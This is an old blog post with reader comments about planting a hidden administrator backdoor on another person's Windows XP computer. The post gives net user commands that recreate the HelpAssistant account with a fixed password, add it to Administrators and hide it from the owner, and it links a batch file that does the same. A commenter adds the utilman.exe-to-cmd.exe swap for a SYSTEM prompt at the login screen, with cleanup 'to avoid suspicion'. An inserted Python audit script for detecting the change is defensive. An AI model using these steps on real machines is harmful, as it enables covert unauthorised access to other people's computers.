About Windows XP's secret "HelpAssistant" account hack

24 June, 2009 | 4 comments

I'm sure most Windows XP users might feel impotent when they want illegal access to a computer configured with an "Administrators" account (also known as an Admin account) that has a password. Well, there's a backdoor hack in Windows XP which can come to your rescue in such cases. The backdoor hack uses the HelpAssistant account pre-configured in Windows XP to get around the problem discussed above.

**Note** that this hack works only if you currently have access to a live account with Admin privileges. This means you need to execute the following commands while you're logged into an Admin account. Guest accounts, or ones which do not have the privilege to create and remove user accounts, will not be able to use this hack. You need to be logged into an Admin account to perform this hack only once, and then HURRAY!!! you yourself are the admin without anyone coming to know about this. The HelpAssistant hack, once performed, will give you complete access to Windows XP with Admin privileges.
Interesting, huh...?

For those intellects who would like to understand the process, I'm providing a comprehensive explanation. The process involves executing the following three commands at the command prompt:

1] The first command "cd\" changes the current location to the root of the current drive. This step is not at all necessary, but it's good practice to execute commands in a clean prompt.

2] The second command "net user HelpAssistant /delete" deletes the pre-configured HelpAssistant account from Windows XP. This clears our way for using the backdoor hack. Make sure you preserve the case: 'H' and 'A' should be in caps.

3] The third command "net user HelpAssistant gg123 /add" creates a HelpAssistant account with the password "gg123". You can set the password as per your comfort.

4] The fourth command "net localgroup Administrators HelpAssistant /add" adds the HelpAssistant user to the Administrators group, giving you Admin privileges.

Your HelpAssistant hack is now complete. Now when you restart your computer, the "HelpAssistant" account logo won't show up at the login screen. This is the hack: the account, in spite of being present, is hidden. You'll have to press "Ctrl-Alt-Del" twice at the login screen to bring up a Login window. Enter "HelpAssistant" as the Username, and the password, to log in to the account. The owner of the PC will never come to know that you've got admin access to his computer unless he/she is technically smart enough to know that HelpAssistant really exists. The probability of this happening is minimal, so don't worry. Now enjoy unrestrained access in your PC with Admin privileges.

--> The HelpAssistant account maintains your password for only 42 days, on the expiry of which you'll be prompted at the login screen to change the password. You can set the previously set password again if you want.

Lazy people who do not want to spend their minds and effort on the above process can download my executable batch file to perform the hack for them. Make sure you run the file in a session with Admin privileges, or else this hack will fail. The preset password in the file is "gg123".

Here's the link: HelpAssistant Hack.zip
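
From the machine owner's side, the change made by the commands described above shows up in the output of `net localgroup Administrators` and `net user HelpAssistant`. The following is an added example, not code from the original post: it parses saved output of those two commands and reports an unexpected Administrators member and an active HelpAssistant account. The sample outputs are constructed, and the function names and the `expected_admins` allowlist are assumptions.

```python
import re

# Constructed sample: `net localgroup Administrators` output after the change.
SAMPLE_GROUP = """\
Alias name     Administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
HelpAssistant
Owner
The command completed successfully.
"""

# Constructed sample: `net user HelpAssistant` output, trimmed to two fields.
SAMPLE_USER = """\
User name                    HelpAssistant
Account active               Yes
The command completed successfully.
"""

def group_members(output):
    """Return the names listed between the dashed rule and the status line."""
    lines = [l.strip() for l in output.splitlines()]
    rule = next((i for i, l in enumerate(lines) if re.fullmatch(r"-{5,}", l)), None)
    if rule is None:
        return []
    members = []
    for name in lines[rule + 1:]:
        if not name or name.startswith("The command completed"):
            break
        members.append(name)
    return members

def user_field(output, field):
    """Return the value of a 'Field name   value' row, or None if absent."""
    m = re.search(rf"^{re.escape(field)}[ \t]{{2,}}(.+)$", output, re.MULTILINE)
    return m.group(1).strip() if m else None

def audit(group_output, user_output, expected_admins, account="HelpAssistant"):
    """Report unexpected Administrators members and whether `account` is active."""
    allowed = {n.lower() for n in expected_admins}  # compare without regard to case
    findings = [f"unexpected member of Administrators: {m}"
                for m in group_members(group_output) if m.lower() not in allowed]
    if (user_field(user_output, "Account active") or "").lower() == "yes":
        findings.append(f"{account} is active")
    return findings
```

Calling `audit(SAMPLE_GROUP, SAMPLE_USER, ["Administrator", "Owner"])` on the constructed samples returns both findings; an account that is absent from the group and marked inactive returns an empty list.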


Colin Thomas said...

dude i think i've seen this somewhere. :P

Anonymous said...

nice cool, I'm gonna try it

Colin Thomas said...

First boot your comp with a live CD....I used Mandriva 2009 Spring edition....

navigate to your 'C:\windows\system32' folder......

rename 'utilman.exe' as 'utilman.exe.bak'

make a duplicate copy of 'cmd.exe'

now rename this duplicate copy of 'cmd.exe' as 'utilman.exe'

reboot your computer

when you are at the login screen.....press 'Windows key + U' ..................

you have a command prompt with FULL SYSTEM RIGHTS.........now create a user without a password

after creating user reboot computer.....login with the user you created....

after you have done what you wanted to do....'LOGOFF' (don't shutdown)

again press 'Windows key + U' ........now remove the user you created....to avoid suspicion

Idea inspired by presentation of working of Stoned bootkit by Peter Kleissner at Black Hat Con, USA 2009